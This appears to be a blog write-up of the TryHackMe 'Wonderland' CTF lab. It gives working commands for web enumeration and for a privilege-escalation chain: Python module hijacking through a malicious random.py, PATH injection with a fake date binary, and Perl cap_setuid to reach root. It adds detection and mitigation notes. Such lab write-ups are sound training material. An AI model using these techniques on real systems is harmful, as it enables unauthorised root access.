Wonderland

Medium · Feb 07, 2026

TryHackMe Linux sshsudopath-injectioncapabilitiesprivilege-escalation

Wonderland CTF

Scope & Target

  • Host: <TARGET_IP>
  • Goal: Obtain user and root flags
  • Methodology: Recon → Web enum → Initial access → Priv‑esc chain (alice → rabbit → hatter → root)

TL;DR Path

  1. Web enum discovers /r/a/b/b/i/t/ and reveals credentials for alice.
  2. SSH as alice.
  3. Sudo‑allowed Python as user rabbit executes /home/alice/walrus_and_the_carpenter.py; hijack Python module resolution with a malicious random.py to pop a shell as rabbit.
  4. Tea Party binary is vulnerable to PATH injection on date; craft /tmp/bin/date → shell as hatter.
  5. Enumerate capabilities; /usr/bin/perl has cap_setuid+ep. Use Perl to setuid(0) → root.
  6. Read flags.

Recon

Nmap

nmap -sV -Pn -oN nmap.txt <TARGET_IP>
# 22/tcp open  ssh OpenSSH 7.6p1
# 80/tcp open  http Golang net/http server

Notes: Two exposed services, HTTP on 80 looks like a Go server, likely a light file server or app; SSH is present for potential credential reuse.

Content Discovery

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<TARGET_IP>/FUZZ
# ... r (301), img (301), index.html (301)

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<TARGET_IP>/r/FUZZ
# ... a (301)

Manual traversal suggests a rabbit‑hole (literally).

Web Enumeration → Credential Disclosure

Progressive path guessing:

curl http://<TARGET_IP>/r/
curl http://<TARGET_IP>/r/a/
curl http://<TARGET_IP>/r/a/b/b/i/t/

Final page contains a hidden line with credentials:

<p style="display: none;">
  alice:<LEAKED_PASSWORD>
</p>

Initial Foothold (SSH → alice)

ssh alice@<TARGET_IP>
whoami && id && ls -la
# user: alice

Interesting files:

  • ~/walrus_and_the_carpenter.py
  • ~/root.txt (not readable yet)

Sudo privileges:

sudo -l
# (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

alice → rabbit: Python Module Hijacking via random.py

walrus_and_the_carpenter.py:

import random
poem = """..."""
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

Observation: Python’s import order puts the script directory early in sys.path. If we drop a random.py next to the target script, it will be imported instead of the stdlib random module.

Create malicious module:

# /home/alice/random.py
import os
os.execl('/bin/bash', 'bash', '-p')

Execute as rabbit via sudo:

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
whoami
# rabbit

rabbit → hatter: PATH Injection on teaParty

List rabbit’s home:

ls -la /home/rabbit
# teaParty (ELF or script)
/home/rabbit/teaParty
# Output includes: "Probably by Sun, 09 Nov 2025 00:46:02 +0000"
# The program likely calls `date` without an absolute path.

Exploit by shadowing date:

mkdir -p /tmp/bin
printf '#!/bin/sh\n/bin/sh -p\n' > /tmp/bin/date
chmod +x /tmp/bin/date
PATH=/tmp/bin:$PATH /home/rabbit/teaParty

id
# uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)

hatter → root: Linux Capabilities (Perl cap_setuid)

Enumerate capabilities:

getcap -r / 2>/dev/null
# /usr/bin/perl = cap_setuid+ep
# /usr/bin/perl5.x = cap_setuid+ep

Abuse with Perl:

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
id
# uid=0(root)

Loot (Flags)

cat /root/user.txt /home/alice/root.txt
# [redacted wonderland user flag]
# [redacted wonderland root flag]

Detection & Forensics Notes

  • Web access logs for /r/a/b/b/i/t/ reveal reconnaissance timeline.
  • .bash_history for alice, rabbit, hatter (if not restricted) exposes commands: sudo -u rabbit ..., PATH=/tmp/bin:$PATH ..., Perl setuid exploit.
  • File system artifacts:
    • /home/alice/random.py
    • /tmp/bin/date
  • auth.log / secure entries for escalations tied to sudo and SSH sessions.
  • getcap enumeration indicates misconfiguration (capability left on an interpreter).

Mitigations

  • Web app / Content: Don’t expose credentials in hidden DOM; move secrets to server‑side; apply content reviews.
  • Least privilege: Remove sudo rules that allow executing interpreters; if needed, whitelist exact binaries with absolute interpreter paths and NOEXEC mounts where possible.
  • Python imports: Execute with sanitized PYTHONPATH; vendor required modules; run with -I (isolated mode) or set sys.path explicitly.
  • PATH safety: In set‑uid or privileged binaries, use absolute paths for all external calls or drop privileges before invoking utilities.
  • Capabilities: Avoid granting cap_setuid to interpreters (Perl/Python). If required, wrap capability into a minimal, audited helper in C that drops privileges immediately after use.
  • Monitoring: Alert on capability changes (setcap), unexpected binaries in world‑writable directories (/tmp/bin/*), and suspicious sudo -u <otheruser> patterns.

Appendix — Full Command Log

# Recon
nmap -sV -Pn -oN nmap.txt <TARGET_IP>
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<TARGET_IP>/FUZZ
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<TARGET_IP>/r/FUZZ
curl http://<TARGET_IP>/r/a/b/b/i/t/

# Initial access
ssh alice@<TARGET_IP>

# Escalate to rabbit
cat /home/alice/walrus_and_the_carpenter.py
printf 'import os\nos.execl(\"/bin/bash\",\"bash\",\"-p\")\n' > /home/alice/random.py
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

# Rabbit → Hatter (PATH injection)
mkdir -p /tmp/bin
printf '#!/bin/sh\n/bin/sh -p\n' > /tmp/bin/date
chmod +x /tmp/bin/date
PATH=/tmp/bin:$PATH /home/rabbit/teaParty

# Hatter → Root (capabilities)
getcap -r / 2>/dev/null | grep perl
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

# Proof
cat /root/user.txt /home/alice/root.txt